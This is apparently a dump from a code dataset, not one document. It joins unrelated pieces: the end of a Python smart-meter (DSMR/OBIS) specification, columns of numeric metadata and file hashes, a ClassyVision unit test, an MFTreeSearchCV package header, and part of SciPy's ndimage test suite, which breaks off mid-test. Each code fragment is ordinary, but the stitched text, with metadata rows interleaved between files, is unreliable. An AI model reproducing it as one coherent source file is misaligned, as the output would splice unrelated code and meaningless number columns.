        obis.INSTANTANEOUS_ACTIVE_POWER_L3_NEGATIVE: CosemParser(ValueParser(Decimal)),
        obis.EQUIPMENT_IDENTIFIER_GAS: CosemParser(ValueParser(str)),
        obis.HOURLY_GAS_METER_READING: MBusParser(
            ValueParser(timestamp),
            ValueParser(Decimal)
        )
    }
}
# All base specifications, e.g. for iterating during auto-detection.
ALL = (V2_2, V3, V4, V5)

# Belgian (Fluvius) meters: V5 plus a country-specific hourly gas reading.
# deepcopy keeps the base V5 specification unmodified.
BELGIUM_FLUVIUS = deepcopy(V5)
BELGIUM_FLUVIUS['objects'].update({
    obis.BELGIUM_HOURLY_GAS_METER_READING: MBusParser(
        ValueParser(timestamp),
        ValueParser(Decimal)
    )
})

# Luxembourg (Smarty) meters: V5 plus global used/delivered tariff totals.
LUXEMBOURG_SMARTY = deepcopy(V5)
LUXEMBOURG_SMARTY['objects'].update({
    obis.LUXEMBOURG_ELECTRICITY_USED_TARIFF_GLOBAL: CosemParser(ValueParser(Decimal)),
    obis.LUXEMBOURG_ELECTRICITY_DELIVERED_TARIFF_GLOBAL: CosemParser(ValueParser(Decimal)),
})
| 51.177215
| 120
| 0.73485
| 818
| 8,086
| 6.937653
| 0.128362
| 0.321762
| 0.219736
| 0.244229
| 0.861145
| 0.823436
| 0.79859
| 0.783612
| 0.768987
| 0.727753
| 0
| 0.009691
| 0.170542
| 8,086
| 157
| 121
| 51.503185
| 0.83644
| 0.006307
| 0
| 0.721429
| 0
| 0
| 0.010593
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
136f743cf4a462b2a5d4ffac4ed3899fc4f59a93
| 2,744
|
py
|
Python
|
test/heads_fully_convolutional_linear_head_test.py
|
jerryzh168/ClassyVision-1
|
6acfb00a77487a9015803fbaad805330081293a9
|
[
"MIT"
] | 1
|
2020-04-13T03:50:26.000Z
|
2020-04-13T03:50:26.000Z
|
test/heads_fully_convolutional_linear_head_test.py
|
pkassotis/ClassyVision
|
e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e
|
[
"MIT"
] | null | null | null |
test/heads_fully_convolutional_linear_head_test.py
|
pkassotis/ClassyVision
|
e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e
|
[
"MIT"
] | 1
|
2020-08-24T22:45:49.000Z
|
2020-08-24T22:45:49.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import classy_vision.heads.fully_convolutional_linear_head as fcl
import torch
class TestFullyConvolutionalLinearHead(unittest.TestCase):
    """Unit tests for ``FullyConvolutionalLinearHead``.

    Every test feeds a random tensor of shape ``[1, 3, 4, 3, 3]`` through a
    head and checks only the output shape.  The constructor arguments are
    shared, so they live in one place instead of being repeated per test.
    """

    def _build_head(self, **overrides):
        """Construct a head from the default test arguments, with *overrides*
        applied on top."""
        args = {
            "num_classes": 2,
            "in_plane": 3,
            "pool_size": [1, 3, 3],
            "activation_func": "softmax",
            "use_dropout": False,
        }
        args.update(overrides)
        return fcl.FullyConvolutionalLinearHead("default_head", **args)

    def _assert_output_dim(self, head, expected_dim):
        """Run a random input through *head* and check the flattened size."""
        input = torch.rand([1, 3, 4, 3, 3])
        output = head(input)
        self.assertEqual(output.shape, torch.Size([1, expected_dim]))

    def test_fully_convolutional_linear_head(self):
        # Train mode with a fixed pool size yields one prediction per pooled
        # position, hence 2 classes * 4 positions = 8.
        self._assert_output_dim(self._build_head(), 8)

    def test_fully_convolutional_linear_head_eval(self):
        # Eval mode collapses the spatial predictions down to num_classes.
        self._assert_output_dim(self._build_head().eval(), 2)

    def test_fully_convolutional_linear_head_from_cfg(self):
        # Same head as test_fully_convolutional_linear_head, built via config.
        head_cfg = {
            "name": "fully_convolutional_linear",
            "unique_id": "default_head",
            "activation_func": "softmax",
            "pool_size": [1, 3, 3],
            "num_classes": 2,
            "in_plane": 3,
            "use_dropout": False,
        }
        head = fcl.FullyConvolutionalLinearHead.from_config(head_cfg)
        self._assert_output_dim(head, 8)

    def test_fully_convolutional_linear_head_adaptive_pool(self):
        # pool_size=None selects adaptive pooling, collapsing to num_classes.
        self._assert_output_dim(self._build_head(pool_size=None), 2)

    def test_fully_convolutional_linear_head_adaptive_pool_from_cfg(self):
        # Adaptive-pool head built via config (no "pool_size" key).
        head_cfg = {
            "name": "fully_convolutional_linear",
            "unique_id": "default_head",
            "activation_func": "softmax",
            "num_classes": 2,
            "in_plane": 3,
            "use_dropout": False,
        }
        head = fcl.FullyConvolutionalLinearHead.from_config(head_cfg)
        self._assert_output_dim(head, 2)
| 33.876543
| 74
| 0.591837
| 318
| 2,744
| 4.874214
| 0.242138
| 0.092903
| 0.123871
| 0.108387
| 0.809032
| 0.801935
| 0.779355
| 0.779355
| 0.763871
| 0.763871
| 0
| 0.028468
| 0.295918
| 2,744
| 80
| 75
| 34.3
| 0.77381
| 0.069242
| 0
| 0.761194
| 0
| 0
| 0.106709
| 0.0204
| 0
| 0
| 0
| 0
| 0.074627
| 1
| 0.074627
| false
| 0
| 0.044776
| 0
| 0.134328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13a00f4835c5055f585978228d89e0a3b0ee289e
| 129
|
py
|
Python
|
MFTreeSearchCV/__init__.py
|
rajatsen91/MFTreeSearchCV
|
cf5ef5f537267c1c2c34a4f40042a051aad434f9
|
[
"MIT"
] | 8
|
2019-10-24T22:27:10.000Z
|
2021-10-07T00:19:52.000Z
|
MFTreeSearchCV/__init__.py
|
rajatsen91/MFTreeSearchCV
|
cf5ef5f537267c1c2c34a4f40042a051aad434f9
|
[
"MIT"
] | 1
|
2021-03-16T23:20:54.000Z
|
2021-05-25T20:43:27.000Z
|
MFTreeSearchCV/__init__.py
|
rajatsen91/MFTreeSearchCV
|
cf5ef5f537267c1c2c34a4f40042a051aad434f9
|
[
"MIT"
] | 1
|
2020-07-21T21:18:58.000Z
|
2020-07-21T21:18:58.000Z
|
# Code for MFTreeSearchCV
# Contact: rajat.sen@utexas.edu
from __future__ import division
from __future__ import print_function
| 21.5
| 37
| 0.829457
| 17
| 129
| 5.764706
| 0.823529
| 0.204082
| 0.326531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124031
| 129
| 5
| 38
| 25.8
| 0.867257
| 0.410853
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
13aae7fdc034132b91cbd00fb2a7465936fb09e8
| 211,999
|
py
|
Python
|
scipy/ndimage/tests/test_ndimage.py
|
divenex/scipy
|
fe0e253165a73bdb922c4da6a107be0474ee60ac
|
[
"BSD-3-Clause"
] | 1
|
2021-06-30T14:42:40.000Z
|
2021-06-30T14:42:40.000Z
|
scipy/ndimage/tests/test_ndimage.py
|
divenex/scipy
|
fe0e253165a73bdb922c4da6a107be0474ee60ac
|
[
"BSD-3-Clause"
] | 5
|
2020-09-01T01:19:07.000Z
|
2021-10-11T01:06:05.000Z
|
scipy/ndimage/tests/test_ndimage.py
|
divenex/scipy
|
fe0e253165a73bdb922c4da6a107be0474ee60ac
|
[
"BSD-3-Clause"
] | 1
|
2018-04-21T11:45:55.000Z
|
2018-04-21T11:45:55.000Z
|
# Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import sys
import numpy
from numpy import fft
from numpy.testing import (assert_, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_almost_equal,
suppress_warnings)
import pytest
from pytest import raises as assert_raises
import scipy.ndimage as ndimage
# Absolute tolerance used by floating-point comparisons in the tests below.
eps = 1e-12
def sumsq(a, b):
    """Return the Euclidean norm of the element-wise difference a - b."""
    diff = a - b
    return math.sqrt((diff * diff).sum())
class TestNdimage:
def setup_method(self):
# list of numarray data types
self.integer_types = [
numpy.int8, numpy.uint8, numpy.int16, numpy.uint16,
numpy.int32, numpy.uint32, numpy.int64, numpy.uint64]
self.float_types = [numpy.float32, numpy.float64]
self.types = self.integer_types + self.float_types
# list of boundary modes:
self.modes = ['nearest', 'wrap', 'reflect', 'mirror', 'constant']
def test_correlate01(self):
array = numpy.array([1, 2])
weights = numpy.array([2])
expected = [2, 4]
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, expected)
def test_correlate01_overlap(self):
array = numpy.arange(256).reshape(16, 16)
weights = numpy.array([2])
expected = 2 * array
ndimage.correlate1d(array, weights, output=array)
assert_array_almost_equal(array, expected)
def test_correlate02(self):
array = numpy.array([1, 2, 3])
kernel = numpy.array([1])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.correlate1d(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve1d(array, kernel)
assert_array_almost_equal(array, output)
def test_correlate03(self):
array = numpy.array([1])
weights = numpy.array([1, 1])
expected = [2]
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, expected)
def test_correlate04(self):
array = numpy.array([1, 2])
tcor = [2, 3]
tcov = [3, 4]
weights = numpy.array([1, 1])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, tcov)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, tcov)
def test_correlate05(self):
array = numpy.array([1, 2, 3])
tcor = [2, 3, 5]
tcov = [3, 5, 6]
kernel = numpy.array([1, 1])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(tcov, output)
output = ndimage.correlate1d(array, kernel)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve1d(array, kernel)
assert_array_almost_equal(tcov, output)
def test_correlate06(self):
array = numpy.array([1, 2, 3])
tcor = [9, 14, 17]
tcov = [7, 10, 15]
weights = numpy.array([1, 2, 3])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, tcov)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, tcov)
def test_correlate07(self):
array = numpy.array([1, 2, 3])
expected = [5, 8, 11]
weights = numpy.array([1, 2, 1])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, expected)
def test_correlate08(self):
array = numpy.array([1, 2, 3])
tcor = [1, 2, 5]
tcov = [3, 6, 7]
weights = numpy.array([1, 2, -1])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, tcov)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, tcov)
def test_correlate09(self):
array = []
kernel = numpy.array([1, 1])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.correlate1d(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve1d(array, kernel)
assert_array_almost_equal(array, output)
def test_correlate10(self):
array = [[]]
kernel = numpy.array([[1, 1]])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(array, output)
def test_correlate11(self):
array = numpy.array([[1, 2, 3],
[4, 5, 6]])
kernel = numpy.array([[1, 1],
[1, 1]])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal([[4, 6, 10], [10, 12, 16]], output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal([[12, 16, 18], [18, 22, 24]], output)
def test_correlate12(self):
array = numpy.array([[1, 2, 3],
[4, 5, 6]])
kernel = numpy.array([[1, 0],
[0, 1]])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
def test_correlate13(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
for type2 in self.types:
output = ndimage.correlate(array, kernel, output=type2)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, type2)
output = ndimage.convolve(array, kernel,
output=type2)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, type2)
def test_correlate14(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
for type2 in self.types:
output = numpy.zeros(array.shape, type2)
ndimage.correlate(array, kernel,
output=output)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, type2)
ndimage.convolve(array, kernel, output=output)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, type2)
def test_correlate15(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
output = ndimage.correlate(array, kernel,
output=numpy.float32)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel,
output=numpy.float32)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate16(self):
kernel = numpy.array([[0.5, 0],
[0, 0.5]])
for type1 in self.types:
array = numpy.array([[1, 2, 3], [4, 5, 6]], type1)
output = ndimage.correlate(array, kernel, output=numpy.float32)
assert_array_almost_equal([[1, 1.5, 2.5], [2.5, 3, 4]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel, output=numpy.float32)
assert_array_almost_equal([[3, 4, 4.5], [4.5, 5.5, 6]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate17(self):
array = numpy.array([1, 2, 3])
tcor = [3, 5, 6]
tcov = [2, 3, 5]
kernel = numpy.array([1, 1])
output = ndimage.correlate(array, kernel, origin=-1)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve(array, kernel, origin=-1)
assert_array_almost_equal(tcov, output)
output = ndimage.correlate1d(array, kernel, origin=-1)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve1d(array, kernel, origin=-1)
assert_array_almost_equal(tcov, output)
def test_correlate18(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
output = ndimage.correlate(array, kernel,
output=numpy.float32,
mode='nearest', origin=-1)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel,
output=numpy.float32,
mode='nearest', origin=-1)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, numpy.float32)
    def test_correlate_mode_sequence(self):
        # correlate/convolve are not separable filters, so a per-axis
        # sequence of boundary modes must be rejected with RuntimeError.
        kernel = numpy.ones((2, 2))
        array = numpy.ones((3, 3), float)
        with assert_raises(RuntimeError):
            ndimage.correlate(array, kernel, mode=['nearest', 'reflect'])
        with assert_raises(RuntimeError):
            ndimage.convolve(array, kernel, mode=['nearest', 'reflect'])
def test_correlate19(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
output = ndimage.correlate(array, kernel,
output=numpy.float32,
mode='nearest', origin=[-1, 0])
assert_array_almost_equal([[5, 6, 8], [8, 9, 11]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel,
output=numpy.float32,
mode='nearest', origin=[-1, 0])
assert_array_almost_equal([[3, 5, 6], [6, 8, 9]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate20(self):
weights = numpy.array([1, 2, 1])
expected = [[5, 10, 15], [7, 14, 21]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
output=output)
assert_array_almost_equal(output, expected)
ndimage.convolve1d(array, weights, axis=0,
output=output)
assert_array_almost_equal(output, expected)
def test_correlate21(self):
array = numpy.array([[1, 2, 3],
[2, 4, 6]])
expected = [[5, 10, 15], [7, 14, 21]]
weights = numpy.array([1, 2, 1])
output = ndimage.correlate1d(array, weights, axis=0)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights, axis=0)
assert_array_almost_equal(output, expected)
def test_correlate22(self):
weights = numpy.array([1, 2, 1])
expected = [[6, 12, 18], [6, 12, 18]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='wrap', output=output)
assert_array_almost_equal(output, expected)
ndimage.convolve1d(array, weights, axis=0,
mode='wrap', output=output)
assert_array_almost_equal(output, expected)
def test_correlate23(self):
weights = numpy.array([1, 2, 1])
expected = [[5, 10, 15], [7, 14, 21]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='nearest', output=output)
assert_array_almost_equal(output, expected)
ndimage.convolve1d(array, weights, axis=0,
mode='nearest', output=output)
assert_array_almost_equal(output, expected)
def test_correlate24(self):
weights = numpy.array([1, 2, 1])
tcor = [[7, 14, 21], [8, 16, 24]]
tcov = [[4, 8, 12], [5, 10, 15]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='nearest', output=output, origin=-1)
assert_array_almost_equal(output, tcor)
ndimage.convolve1d(array, weights, axis=0,
mode='nearest', output=output, origin=-1)
assert_array_almost_equal(output, tcov)
def test_correlate25(self):
weights = numpy.array([1, 2, 1])
tcor = [[4, 8, 12], [5, 10, 15]]
tcov = [[7, 14, 21], [8, 16, 24]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='nearest', output=output, origin=1)
assert_array_almost_equal(output, tcor)
ndimage.convolve1d(array, weights, axis=0,
mode='nearest', output=output, origin=1)
assert_array_almost_equal(output, tcov)
def test_correlate26(self):
# test fix for gh-11661 (mirror extension of a length 1 signal)
y = ndimage.convolve1d(numpy.ones(1), numpy.ones(5), mode='mirror')
assert_array_equal(y, numpy.array(5.))
y = ndimage.correlate1d(numpy.ones(1), numpy.ones(5), mode='mirror')
assert_array_equal(y, numpy.array(5.))
def test_gauss01(self):
input = numpy.array([[1, 2, 3],
[2, 4, 6]], numpy.float32)
output = ndimage.gaussian_filter(input, 0)
assert_array_almost_equal(output, input)
def test_gauss02(self):
input = numpy.array([[1, 2, 3],
[2, 4, 6]], numpy.float32)
output = ndimage.gaussian_filter(input, 1.0)
assert_equal(input.dtype, output.dtype)
assert_equal(input.shape, output.shape)
def test_gauss03(self):
# single precision data"
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
output = ndimage.gaussian_filter(input, [1.0, 1.0])
assert_equal(input.dtype, output.dtype)
assert_equal(input.shape, output.shape)
# input.sum() is 49995000.0. With single precision floats, we can't
# expect more than 8 digits of accuracy, so use decimal=0 in this test.
assert_almost_equal(output.sum(dtype='d'), input.sum(dtype='d'),
decimal=0)
assert_(sumsq(input, output) > 1.0)
def test_gauss04(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
otype = numpy.float64
output = ndimage.gaussian_filter(input, [1.0, 1.0], output=otype)
assert_equal(output.dtype.type, numpy.float64)
assert_equal(input.shape, output.shape)
assert_(sumsq(input, output) > 1.0)
def test_gauss05(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
otype = numpy.float64
output = ndimage.gaussian_filter(input, [1.0, 1.0],
order=1, output=otype)
assert_equal(output.dtype.type, numpy.float64)
assert_equal(input.shape, output.shape)
assert_(sumsq(input, output) > 1.0)
def test_gauss06(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
otype = numpy.float64
output1 = ndimage.gaussian_filter(input, [1.0, 1.0], output=otype)
output2 = ndimage.gaussian_filter(input, 1.0, output=otype)
assert_array_almost_equal(output1, output2)
def test_gauss_memory_overlap(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
output1 = ndimage.gaussian_filter(input, 1.0)
ndimage.gaussian_filter(input, 1.0, output=input)
assert_array_almost_equal(output1, input)
def test_prewitt01(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 1.0, 1.0], 1)
output = ndimage.prewitt(array, 0)
assert_array_almost_equal(t, output)
def test_prewitt02(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 1.0, 1.0], 1)
output = numpy.zeros(array.shape, type_)
ndimage.prewitt(array, 0, output)
assert_array_almost_equal(t, output)
def test_prewitt03(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 1)
t = ndimage.correlate1d(t, [1.0, 1.0, 1.0], 0)
output = ndimage.prewitt(array, 1)
assert_array_almost_equal(t, output)
def test_prewitt04(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.prewitt(array, -1)
output = ndimage.prewitt(array, 1)
assert_array_almost_equal(t, output)
def test_sobel01(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 2.0, 1.0], 1)
output = ndimage.sobel(array, 0)
assert_array_almost_equal(t, output)
def test_sobel02(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 2.0, 1.0], 1)
output = numpy.zeros(array.shape, type_)
ndimage.sobel(array, 0, output)
assert_array_almost_equal(t, output)
def test_sobel03(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 1)
t = ndimage.correlate1d(t, [1.0, 2.0, 1.0], 0)
output = numpy.zeros(array.shape, type_)
output = ndimage.sobel(array, 1)
assert_array_almost_equal(t, output)
def test_sobel04(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.sobel(array, -1)
output = ndimage.sobel(array, 1)
assert_array_almost_equal(t, output)
def test_laplace01(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.correlate1d(array, [1, -2, 1], 0)
tmp2 = ndimage.correlate1d(array, [1, -2, 1], 1)
output = ndimage.laplace(array)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_laplace02(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.correlate1d(array, [1, -2, 1], 0)
tmp2 = ndimage.correlate1d(array, [1, -2, 1], 1)
output = numpy.zeros(array.shape, type_)
ndimage.laplace(array, output=output)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_gaussian_laplace01(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [2, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 2])
output = ndimage.gaussian_laplace(array, 1.0)
assert_array_almost_equal(tmp1 + tmp2, output)
def test_gaussian_laplace02(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [2, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 2])
output = numpy.zeros(array.shape, type_)
ndimage.gaussian_laplace(array, 1.0, output)
assert_array_almost_equal(tmp1 + tmp2, output)
    def test_generic_laplace01(self):
        # generic_laplace with a user-supplied second-derivative callback
        # must match gaussian_laplace when the callback wraps gaussian_filter.
        def derivative2(input, axis, output, mode, cval, a, b):
            # extra_arguments/extra_keywords are forwarded here as (a, b).
            sigma = [a, b / 2.0]
            input = numpy.asarray(input)
            order = [0] * input.ndim
            order[axis] = 2
            return ndimage.gaussian_filter(input, sigma, order,
                                           output, mode, cval)
        for type_ in self.types:
            array = numpy.array([[3, 2, 5, 1, 4],
                                 [5, 8, 3, 7, 1],
                                 [5, 6, 9, 3, 5]], type_)
            output = numpy.zeros(array.shape, type_)
            tmp = ndimage.generic_laplace(array, derivative2,
                                          extra_arguments=(1.0,),
                                          extra_keywords={'b': 2.0})
            ndimage.gaussian_laplace(array, 1.0, output)
            assert_array_almost_equal(tmp, output)
def test_gaussian_gradient_magnitude01(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
